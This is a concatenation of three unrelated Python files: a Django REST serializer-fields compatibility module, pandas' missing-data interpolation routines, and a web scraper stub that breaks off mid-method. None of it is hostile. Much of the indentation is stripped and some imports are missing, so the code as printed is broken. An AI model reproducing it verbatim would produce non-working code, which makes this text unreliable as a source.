from django.utils.ipv6 import clean_ipv6_address
__all__ = (
'IntegerField', 'BooleanField', 'CharField', 'ChoiceField',
'MultipleChoiceField', 'FloatField', 'NullBooleanField', 'DecimalField',
'TimeField', 'DateField', 'DateTimeField', 'DurationField', 'ListField',
'DictField', 'HStoreField', 'JSONField', 'ModelField', 'ReadOnlyField',
'SerializerMethodField', 'EmailField', 'RegexField', 'SlugField',
'URLField', 'UUIDField', 'IPAddressField', 'FilePathField', 'FileField',
'ImageField', 'CreateOnlyDefault'
)
class IntegerField(fields.IntegerField):
pass
class BooleanField(fields.BooleanField):
pass
class CharField(fields.CharField):
pass
class ChoiceField(fields.ChoiceField):
pass
class MultipleChoiceField(ChoiceField):
default_error_messages = {
'invalid_choice': u'"{input}" is not a valid choice.',
'not_a_list': u'Expected a list of items but got type "{input_type}".',
'empty': u'This selection may not be empty.'
}
def __init__(self, *args, **kwargs):
self.allow_empty = kwargs.pop('allow_empty', True)
super(MultipleChoiceField, self).__init__(*args, **kwargs)
def get_value(self, dictionary):
if self.field_name not in dictionary:
if getattr(self.root, 'partial', False):
return empty
return dictionary.get(self.field_name, empty)
def to_internal_value(self, data):
if isinstance(data, type('')) or not hasattr(data, '__iter__'):
self.raise_error('not_a_list', input_type=type(data).__name__)
if not self.allow_empty and len(data) == 0:
self.raise_error('empty')
return {
super(MultipleChoiceField, self).to_internal_value(item)
for item in data
}
def to_representation(self, value):
return {
self.choice_strings_to_values.get(str(item), item)
for item in value
}
class FloatField(fields.FloatField):
pass
class NullBooleanField(fields.NullBooleanField):
pass
class DecimalField(fields.DecimalField):
pass
class TimeField(fields.TimeField):
pass
class DateField(fields.DateField):
pass
class DateTimeField(fields.DateTimeField):
pass
class DurationField(fields.AbstractField):
default_error_messages = {
'invalid': u"Duration has wrong format. Use one of these formats "
u"instead: {format}.",
}
def to_internal_value(self, value):
if isinstance(value, datetime.timedelta):
return value
parsed = parse_duration(str(value))
if parsed is not None:
return parsed
self.raise_error('invalid', format='[DD] [HH:[MM:]]ss[.uuuuuu]')
def to_representation(self, value):
return duration_string(value)
class ListField(fields.ListField):
pass
class DictField(fields.DictField):
pass
class HStoreField(fields.HStoreField):
pass
class JSONField(fields.JSONField):
pass
class ModelField(fields.ModelField):
default_error_messages = {
'max_length': u'Ensure this field has no more than {max_length} '
u'characters.'
}
def __init__(self, model_field, **kwargs):
# The `max_length` option is supported by Django's base `Field` class,
# so we'd better support it here
max_length = kwargs.pop('max_length', None)
super(ModelField, self).__init__(model_field, **kwargs)
if max_length is not None:
message = self.error_messages['max_length'].format(max_length=max_length) # NOQA
self.validators.append(MaxLengthValidator(max_length, message=message)) # NOQA
def to_internal_value(self, data):
rel = get_remote_field(self.model_field, default=None)
if rel is not None:
return rel.to._meta.get_field(rel.field_name).to_python(data)
return self.model_field.to_python(data)
def to_representation(self, obj):
value = value_from_object(self.model_field, obj)
if is_protected_type(value):
return value
return self.model_field.value_to_string(obj)
class ReadOnlyField(fields.ReadOnlyField):
pass
class SerializerMethodField(fields.SerializerMethodField):
pass
class CreateOnlyDefault(fields.CreateOnlyDefault):
pass
class EmailField(CharField):
default_error_messages = {
"invalid": u"Enter a valid email address."
}
def __init__(self, **kwargs):
super(EmailField, self).__init__(**kwargs)
validator = EmailValidator(message=self.error_messages['invalid'])
self.validators.append(validator)
class RegexField(CharField):
default_error_messages = {
'invalid': u"This value does not match the required pattern."
}
def __init__(self, regex, **kwargs):
super(RegexField, self).__init__(**kwargs)
validator = RegexValidator(
regex, message=self.error_messages['invalid']
)
self.validators.append(validator)
class SlugField(CharField):
default_error_messages = {
'invalid': u'Enter a valid "slug" consisting of letters, numbers, '
u'underscores or hyphens.'
}
def __init__(self, **kwargs):
super(SlugField, self).__init__(**kwargs)
slug_regex = re.compile(r'^[-a-zA-Z0-9_]+$')
validator = RegexValidator(
slug_regex, message=self.error_messages['invalid']
)
self.validators.append(validator)
class URLField(CharField):
default_error_messages = {
'invalid': u"Enter a valid URL."
}
def __init__(self, **kwargs):
super(URLField, self).__init__(**kwargs)
validator = URLValidator(message=self.error_messages['invalid'])
self.validators.append(validator)
class UUIDField(fields.AbstractField):
valid_formats = ('hex_verbose', 'hex', 'int', 'urn')
default_error_messages = {
'invalid': u'"{value}" is not a valid UUID.'
}
def __init__(self, **kwargs):
self.uuid_format = kwargs.pop('format', 'hex_verbose')
if self.uuid_format not in self.valid_formats:
raise ValueError(
'Invalid format for uuid representation. '
'Must be one of "{0}"'.format('", "'.join(self.valid_formats))
)
super(UUIDField, self).__init__(**kwargs)
def to_internal_value(self, data):
if not isinstance(data, uuid.UUID):
try:
if isinstance(data, int):
return uuid.UUID(int=data)
elif isinstance(data, str):
return uuid.UUID(hex=data)
else:
self.raise_error('invalid', value=data)
except ValueError:
self.raise_error('invalid', value=data)
return data
def to_representation(self, value):
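        # 'hex_verbose' is the canonical dashed form via str(); the other
        # formats delegate to the matching uuid.UUID attribute: value.hex,
        # value.int or value.urn.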
if self.uuid_format == 'hex_verbose':
return str(value)
else:
return getattr(value, self.uuid_format)
class IPAddressField(CharField):
"""Support both IPAddressField and GenericIPAddressField"""
default_error_messages = {
'invalid': u"Enter a valid IPv4 or IPv6 address."
}
def __init__(self, protocol='both', **kwargs):
self.protocol = protocol.lower()
self.unpack_ipv4 = (self.protocol == 'both')
super(IPAddressField, self).__init__(**kwargs)
validators, error_message = ip_address_validators(protocol, self.unpack_ipv4) # NOQA
self.validators.extend(validators)
def to_internal_value(self, data):
if not isinstance(data, six.string_types):
self.raise_error('invalid', value=data)
if ':' in data:
try:
if self.protocol in ('both', 'ipv6'):
return clean_ipv6_address(data, self.unpack_ipv4)
except DjangoValidationError:
self.raise_error('invalid', value=data)
return super(IPAddressField, self).to_internal_value(data)
class FilePathField(ChoiceField):
default_error_messages = {
'invalid_choice': u'"{input}" is not a valid path choice.'
}
def __init__(self, path, match=None, recursive=False, allow_files=True,
allow_folders=False, required=None, **kwargs):
# Defer to Django's FilePathField implementation to get the
# valid set of choices
field = DjangoFilePathField(
path, match=match, recursive=recursive, allow_files=allow_files,
allow_folders=allow_folders, required=required
)
kwargs['choices'] = field.choices
super(FilePathField, self).__init__(**kwargs)
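# A minimal usage sketch (hypothetical path and pattern; mirrors Django's
# FilePathField semantics):
#
#   field = FilePathField(path="/etc", match=r".*\.conf$")
#   # the files under /etc matching the pattern become the valid choices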
class FileField(fields.AbstractField):
default_error_messages = {
'required': u'No file was submitted.',
'invalid': u'The submitted data was not a file. Check the encoding '
u'type on the form.',
'no_name': u'No filename could be determined.',
'empty': u'The submitted file is empty.',
'max_length': u'Ensure this filename has at most {max_length} '
u'characters (it has {length}).',
}
def __init__(self, *args, **kwargs):
self.max_length = kwargs.pop('max_length', None)
self.allow_empty_file = kwargs.pop('allow_empty_file', False)
if 'use_url' in kwargs:
self.use_url = kwargs.pop('use_url')
super(FileField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
try:
# `UploadedFile` objects should have name and size attributes
file_name = data.name
file_size = data.size
except AttributeError:
self.raise_error('invalid')
if not file_name:
self.raise_error('no_name')
if not self.allow_empty_file and not file_size:
self.raise_error('empty')
if self.max_length and len(file_name) > self.max_length:
self.raise_error(
'max_length', max_length=self.max_length, length=len(file_name)
)
return data
def to_representation(self, value):
use_url = getattr(self, 'use_url', settings.UPLOADED_FILES_USE_URL)
if not value:
return None
if use_url:
if not getattr(value, 'url', None):
# If the file has not been saved it may not have a URL
return None
url = value.url
return url
return value.name
class ImageField(FileField):
default_error_messages = {
'invalid_image': u'Upload a valid image. The file you uploaded was '
u'either not an image or a corrupted image.'
}
def __init__(self, *args, **kwargs):
self._DjangoImageField = kwargs.pop(
'_DjangoImageField', DjangoImageField
)
super(ImageField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
# Image validation is a bit grungy, so we'll just outright
# defer to Django's implementation so we don't need to
# consider it, or treat PIL as a test dependency
file_object = super(ImageField, self).to_internal_value(data)
django_field = self._DjangoImageField()
django_field.error_messages = self.error_messages
django_field.to_python(file_object)
return file_object
|
|
"""
Routines for filling missing data.
"""
from functools import partial
from typing import TYPE_CHECKING, Any, List, Optional, Set, Union
import numpy as np
from pandas._libs import algos, lib
from pandas._typing import ArrayLike, Axis, DtypeObj
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from
from pandas.core.dtypes.common import (
ensure_float64,
is_integer_dtype,
is_numeric_v_string_like,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import isna
if TYPE_CHECKING:
from pandas import Index
def mask_missing(arr: ArrayLike, values_to_mask) -> np.ndarray:
"""
Return a masking array of same size/shape as arr
with entries equaling any member of values_to_mask set to True
Parameters
----------
arr : ArrayLike
values_to_mask: list, tuple, or scalar
Returns
-------
np.ndarray[bool]
"""
# When called from Block.replace/replace_list, values_to_mask is a scalar
# known to be holdable by arr.
# When called from Series._single_replace, values_to_mask is tuple or list
dtype, values_to_mask = infer_dtype_from(values_to_mask)
values_to_mask = np.array(values_to_mask, dtype=dtype)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
# GH 21977
mask = np.zeros(arr.shape, dtype=bool)
for x in nonna:
if is_numeric_v_string_like(arr, x):
# GH#29553 prevent numpy deprecation warnings
pass
else:
mask |= arr == x
if na_mask.any():
mask |= isna(arr)
return mask
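# Example (illustrative) of the masking behaviour above:
#   mask_missing(np.array([1.0, 2.0, np.nan]), [2.0, np.nan])
#   # -> array([False,  True,  True])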
def clean_fill_method(method, allow_nearest: bool = False):
# asfreq is compat for resampling
if method in [None, "asfreq"]:
return None
if isinstance(method, str):
method = method.lower()
if method == "ffill":
method = "pad"
elif method == "bfill":
method = "backfill"
valid_methods = ["pad", "backfill"]
expecting = "pad (ffill) or backfill (bfill)"
if allow_nearest:
valid_methods.append("nearest")
expecting = "pad (ffill), backfill (bfill) or nearest"
if method not in valid_methods:
raise ValueError(f"Invalid fill method. Expecting {expecting}. Got {method}")
return method
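# Illustrative examples of the normalization above:
#   clean_fill_method("ffill")   # -> "pad"
#   clean_fill_method("bfill")   # -> "backfill"
#   clean_fill_method("asfreq")  # -> None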
# interpolation methods that dispatch to np.interp
NP_METHODS = ["linear", "time", "index", "values"]
# interpolation methods that dispatch to _interpolate_scipy_wrapper
SP_METHODS = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"krogh",
"spline",
"polynomial",
"from_derivatives",
"piecewise_polynomial",
"pchip",
"akima",
"cubicspline",
]
def clean_interp_method(method: str, **kwargs) -> str:
order = kwargs.get("order")
if method in ("spline", "polynomial") and order is None:
raise ValueError("You must specify the order of the spline or polynomial.")
valid = NP_METHODS + SP_METHODS
if method not in valid:
raise ValueError(f"method must be one of {valid}. Got '{method}' instead.")
return method
def find_valid_index(values, how: str):
"""
Retrieves the index of the first valid value.
Parameters
----------
values : ndarray or ExtensionArray
how : {'first', 'last'}
Use this parameter to change between the first or last valid index.
Returns
-------
int or None
"""
assert how in ["first", "last"]
if len(values) == 0: # early stop
return None
is_valid = ~isna(values)
if values.ndim == 2:
is_valid = is_valid.any(1) # reduce axis 1
if how == "first":
idxpos = is_valid[::].argmax()
if how == "last":
idxpos = len(values) - 1 - is_valid[::-1].argmax()
chk_notna = is_valid[idxpos]
if not chk_notna:
return None
return idxpos
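# Example (illustrative):
#   find_valid_index(np.array([np.nan, 1.0, np.nan]), "first")  # -> 1
#   find_valid_index(np.array([np.nan, 1.0, np.nan]), "last")   # -> 1
#   find_valid_index(np.array([np.nan, np.nan]), "first")       # -> None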
def interpolate_1d(
xvalues: "Index",
yvalues: np.ndarray,
method: Optional[str] = "linear",
limit: Optional[int] = None,
limit_direction: str = "forward",
limit_area: Optional[str] = None,
fill_value: Optional[Any] = None,
bounds_error: bool = False,
order: Optional[int] = None,
**kwargs,
):
"""
Logic for the 1-d interpolation. The result should be 1-d, inputs
xvalues and yvalues will each be 1-d arrays of the same length.
    Bounds_error is currently hardcoded to False since the non-SciPy
    interpolation methods don't take it as an argument.
"""
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
result = np.empty(xvalues.shape, dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == "time":
if not needs_i8_conversion(xvalues.dtype):
raise ValueError(
"time-weighted interpolation only works "
"on Series or DataFrames with a "
"DatetimeIndex"
)
method = "values"
valid_limit_directions = ["forward", "backward", "both"]
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
raise ValueError(
"Invalid limit_direction: expecting one of "
f"{valid_limit_directions}, got '{limit_direction}'."
)
if limit_area is not None:
valid_limit_areas = ["inside", "outside"]
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError(
f"Invalid limit_area: expecting one of {valid_limit_areas}, got "
f"{limit_area}."
)
# default limit is unlimited GH #16282
limit = algos.validate_limit(nobs=None, limit=limit)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(find_valid_index(yvalues, "first")))
end_nans = set(range(1 + find_valid_index(yvalues, "last"), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
    # are more than 'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
preserve_nans: Union[List, Set]
if limit_direction == "forward":
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == "backward":
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == "inside":
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == "outside":
# preserve NaNs on the inside
preserve_nans |= mid_nans
    # sort preserve_nans and convert to list
preserve_nans = sorted(preserve_nans)
result = yvalues.copy()
# xarr to pass to NumPy/SciPy
xarr = xvalues._values
if needs_i8_conversion(xarr.dtype):
# GH#1646 for dt64tz
xarr = xarr.view("i8")
if method == "linear":
inds = xarr
else:
inds = np.asarray(xarr)
if method in ("values", "index"):
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
if method in NP_METHODS:
# np.interp requires sorted X values, #21037
indexer = np.argsort(inds[valid])
result[invalid] = np.interp(
inds[invalid], inds[valid][indexer], yvalues[valid][indexer]
)
else:
result[invalid] = _interpolate_scipy_wrapper(
inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order,
**kwargs,
)
result[preserve_nans] = np.nan
return result
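# A minimal sketch of driving interpolate_1d directly (assumes a pandas
# Index for xvalues; illustrative only):
#
#   import pandas as pd
#   x = pd.Index([0, 1, 2, 3, 4])
#   y = np.array([0.0, np.nan, np.nan, 3.0, 4.0])
#   interpolate_1d(x, y, method="linear")
#   # -> array([0., 1., 2., 3., 4.])
#   interpolate_1d(x, y, method="linear", limit=1)
#   # -> array([0., 1., nan, 3., 4.])  (the second consecutive NaN
#   #    exceeds the forward limit and is preserved)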
def _interpolate_scipy_wrapper(
x, y, new_x, method, fill_value=None, bounds_error=False, order=None, **kwargs
):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
    the list in clean_interp_method.
"""
extra = f"{method} interpolation requires SciPy."
import_optional_dependency("scipy", extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
"barycentric": interpolate.barycentric_interpolate,
"krogh": interpolate.krogh_interpolate,
"from_derivatives": _from_derivatives,
"piecewise_polynomial": _from_derivatives,
}
if getattr(x, "_is_all_dates", False):
# GH 5975, scipy.interp1d can't handle datetime64s
x, new_x = x._values.astype("i8"), new_x.astype("i8")
if method == "pchip":
alt_methods["pchip"] = interpolate.pchip_interpolate
elif method == "akima":
alt_methods["akima"] = _akima_interpolate
elif method == "cubicspline":
alt_methods["cubicspline"] = _cubicspline_interpolate
interp1d_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"polynomial",
]
if method in interp1d_methods:
if method == "polynomial":
method = order
terp = interpolate.interp1d(
x, y, kind=method, fill_value=fill_value, bounds_error=bounds_error
)
new_y = terp(new_x)
elif method == "spline":
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError(
f"order needs to be specified and greater than 0; got order: {order}"
)
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This number includes the function
value as 0th derivative.
extrapolate : bool, optional
        Whether to extrapolate to out-of-bounds points based on first and last
        intervals, or to return NaNs. Default: False.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1), orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
        The result, of length R or length M or M by R.
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
return P(x, nu=der)
def _cubicspline_interpolate(xi, yi, x, axis=0, bc_type="not-a-knot", extrapolate=None):
"""
Convenience function for cubic spline data interpolator.
See `scipy.interpolate.CubicSpline` for details.
Parameters
----------
xi : array_like, shape (n,)
1-d array containing values of the independent variable.
Values must be real, finite and in strictly increasing order.
yi : array_like
Array containing values of the dependent variable. It can have
arbitrary number of dimensions, but the length along ``axis``
(see below) must match the length of ``x``. Values must be finite.
x : scalar or array_like, shape (m,)
axis : int, optional
Axis along which `y` is assumed to be varying. Meaning that for
``x[i]`` the corresponding values are ``np.take(y, i, axis=axis)``.
Default is 0.
bc_type : string or 2-tuple, optional
Boundary condition type. Two additional equations, given by the
boundary conditions, are required to determine all coefficients of
polynomials on each segment [2]_.
If `bc_type` is a string, then the specified condition will be applied
at both ends of a spline. Available conditions are:
* 'not-a-knot' (default): The first and second segment at a curve end
are the same polynomial. It is a good default when there is no
information on boundary conditions.
* 'periodic': The interpolated functions is assumed to be periodic
of period ``x[-1] - x[0]``. The first and last value of `y` must be
identical: ``y[0] == y[-1]``. This boundary condition will result in
``y'[0] == y'[-1]`` and ``y''[0] == y''[-1]``.
* 'clamped': The first derivative at curves ends are zero. Assuming
a 1D `y`, ``bc_type=((1, 0.0), (1, 0.0))`` is the same condition.
* 'natural': The second derivative at curve ends are zero. Assuming
a 1D `y`, ``bc_type=((2, 0.0), (2, 0.0))`` is the same condition.
If `bc_type` is a 2-tuple, the first and the second value will be
applied at the curve start and end respectively. The tuple values can
be one of the previously mentioned strings (except 'periodic') or a
tuple `(order, deriv_values)` allowing to specify arbitrary
derivatives at curve ends:
* `order`: the derivative order, 1 or 2.
* `deriv_value`: array_like containing derivative values, shape must
be the same as `y`, excluding ``axis`` dimension. For example, if
`y` is 1D, then `deriv_value` must be a scalar. If `y` is 3D with
the shape (n0, n1, n2) and axis=2, then `deriv_value` must be 2D
and have the shape (n0, n1).
extrapolate : {bool, 'periodic', None}, optional
If bool, determines whether to extrapolate to out-of-bounds points
based on first and last intervals, or to return NaNs. If 'periodic',
periodic extrapolation is used. If None (default), ``extrapolate`` is
set to 'periodic' for ``bc_type='periodic'`` and to True otherwise.
See Also
--------
scipy.interpolate.CubicHermiteSpline
Returns
-------
y : scalar or array_like
The result, of shape (m,)
References
----------
.. [1] `Cubic Spline Interpolation
<https://en.wikiversity.org/wiki/Cubic_Spline_Interpolation>`_
on Wikiversity.
.. [2] Carl de Boor, "A Practical Guide to Splines", Springer-Verlag, 1978.
"""
from scipy import interpolate
P = interpolate.CubicSpline(
xi, yi, axis=axis, bc_type=bc_type, extrapolate=extrapolate
)
return P(x)
def _interpolate_with_limit_area(
values: ArrayLike, method: str, limit: Optional[int], limit_area: Optional[str]
) -> ArrayLike:
"""
Apply interpolation and limit_area logic to values along a to-be-specified axis.
Parameters
----------
values: array-like
Input array.
method: str
Interpolation method. Could be "bfill" or "pad"
limit: int, optional
Index limit on interpolation.
limit_area: str
Limit area for interpolation. Can be "inside" or "outside"
Returns
-------
values: array-like
Interpolated array.
"""
invalid = isna(values)
if not invalid.all():
first = find_valid_index(values, "first")
last = find_valid_index(values, "last")
values = interpolate_2d(
values,
method=method,
limit=limit,
)
if limit_area == "inside":
invalid[first : last + 1] = False
elif limit_area == "outside":
invalid[:first] = invalid[last + 1 :] = False
values[invalid] = np.nan
return values
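# Example (illustrative):
#   arr = np.array([np.nan, 1.0, np.nan, 3.0, np.nan])
#   _interpolate_with_limit_area(arr.copy(), "pad", None, "inside")
#   # -> array([nan, 1., 1., 3., nan]); only the NaN between valid
#   #    values is filled, the leading/trailing NaNs are preserved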
def interpolate_2d(
values,
method: str = "pad",
axis: Axis = 0,
limit: Optional[int] = None,
limit_area: Optional[str] = None,
):
"""
    Perform an actual interpolation of values. Values will be made 2-d if
    needed, filled in place, and the result returned.
Parameters
----------
values: array-like
Input array.
method: str, default "pad"
Interpolation method. Could be "bfill" or "pad"
axis: 0 or 1
Interpolation axis
limit: int, optional
Index limit on interpolation.
limit_area: str, optional
Limit area for interpolation. Can be "inside" or "outside"
Returns
-------
values: array-like
Interpolated array.
"""
if limit_area is not None:
return np.apply_along_axis(
partial(
_interpolate_with_limit_area,
method=method,
limit=limit,
limit_area=limit_area,
),
axis,
values,
)
orig_values = values
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with axis != 0")
values = values.reshape(tuple((1,) + values.shape))
method = clean_fill_method(method)
tvalues = transf(values)
if method == "pad":
result = _pad_2d(tvalues, limit=limit)
else:
result = _backfill_2d(tvalues, limit=limit)
result = transf(result)
# reshape back
if ndim == 1:
result = result[0]
if orig_values.dtype.kind in ["m", "M"]:
# convert float back to datetime64/timedelta64
result = result.view(orig_values.dtype)
return result
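# A minimal sketch (illustrative only):
#   arr = np.array([np.nan, 1.0, np.nan, np.nan, 4.0])
#   interpolate_2d(arr.copy(), method="pad", limit=1)
#   # -> array([nan, 1., 1., nan, 4.])  (forward fill, at most one step)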
def _cast_values_for_fillna(values, dtype: DtypeObj, has_mask: bool):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if needs_i8_conversion(dtype):
values = values.view(np.int64)
elif is_integer_dtype(values) and not has_mask:
# NB: this check needs to come after the datetime64 check above
# has_mask check to avoid casting i8 values that have already
# been cast from PeriodDtype
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None):
# boilerplate for _pad_1d, _backfill_1d, _pad_2d, _backfill_2d
dtype = values.dtype
has_mask = mask is not None
if not has_mask:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype, has_mask)
mask = mask.view(np.uint8)
return values, mask
def _pad_1d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
algos.pad_inplace(values, mask, limit=limit)
return values
def _backfill_1d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
algos.backfill_inplace(values, mask, limit=limit)
return values
def _pad_2d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def _backfill_2d(values, limit=None, mask=None):
values, mask = _fillna_prep(values, mask)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {"pad": _pad_1d, "backfill": _backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = set(np.where(windowed)[0] + limit) | set(
np.where((~invalid[: limit + 1]).cumsum() == 0)[0]
)
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx_inv = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx_inv))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
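# Example (illustrative): with invalid = [False, True, True, True, False],
# fw_limit=1 and bw_limit=0, the indices {2, 3} exceed the forward limit
# and are returned, so index 1 is the only NaN eligible for filling.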
def _rolling_window(a: np.ndarray, window: int):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
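# Example (illustrative; mirrors the docstring above):
#   >>> a = np.array([True, True, False, True, False])
#   >>> _rolling_window(a, 2)
#   array([[ True,  True],
#          [ True, False],
#          [False,  True],
#          [ True, False]])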
|
|
from bs4 import BeautifulSoup
try:
# For Python 3.0 and later
from urllib.request import urlopen
from urllib.error import URLError
from urllib.error import HTTPError
except ImportError:
# Fall back to Python 2's urllib2
from urllib2 import urlopen
from urllib2 import URLError
from urllib2 import HTTPError
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urlparse
from urlparse import urlparse
try:
from simplejson import loads, dumps
except ImportError:
from json import loads, dumps
TITLE = "title"
NAME = "name"
ITEMPROP = "itemprop"
URL = "url"
SECURE_URL = "secure_url"
HEIGHT = "height"
WIDTH = "width"
HREF_PROPERTY = "href"
META_TAG = "meta"
LINK_TAG = "link"
SOURCE = "source"
IMAGE = "image"
VIDEO = "video"
TYPE = "type"
CONTENT = "content"
PROPERTY = "property"
DESCRIPTION = "description"
KEYWORDS = "keywords"
THEME_COLOR = "theme-color"
OG = "og:"
DEFAULT_HTML_PARSER = "html5lib"
DEFAULT_HTML5_VIDEO_EMBED = "text/html"
INFORMATION_SPACE = "www."
HTTP_PROTOCOL = "http"
HTTP_PROTOCOL_NORMAL = "http://"
SECURE_HTTP_PROTOCOL = "https://"
class SimpleScraper():
"""docstring for SimpleScraper"""
def get_scraped_data(self, link_to_scrap):
try:
result = {}
if link_to_scrap == "":
return {
"error": "Did not get a valid link"
}
try:
if (link_to_scrap.find(INFORMATION_SPACE) == -1 and link_to_scrap.find(HTTP_PROTOCOL) == -1):
link_to_scrap = HTTP_PROTOCOL_NORMAL + INFORMATION_SPACE + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
# try secure protocol
request_code = requestResult.getcode()
                    if request_code < 200 or request_code > 400:
                        # retry over https, replacing the plain-http prefix
                        link_to_scrap = link_to_scrap.replace(HTTP_PROTOCOL_NORMAL, SECURE_HTTP_PROTOCOL)
                        requestResult = self.__get_request_content(link_to_scrap)
elif (link_to_scrap.find(HTTP_PROTOCOL) == -1):
link_to_scrap = HTTP_PROTOCOL_NORMAL + link_to_scrap
requestResult = self.__get_request_content(link_to_scrap)
# try secure protocol
request_code = requestResult.getcode()
                    if request_code < 200 or request_code > 400:
                        # retry over https, replacing the plain-http prefix
                        link_to_scrap = link_to_scrap.replace(HTTP_PROTOCOL_NORMAL, SECURE_HTTP_PROTOCOL)
                        requestResult = self.__get_request_content(link_to_scrap)
else:
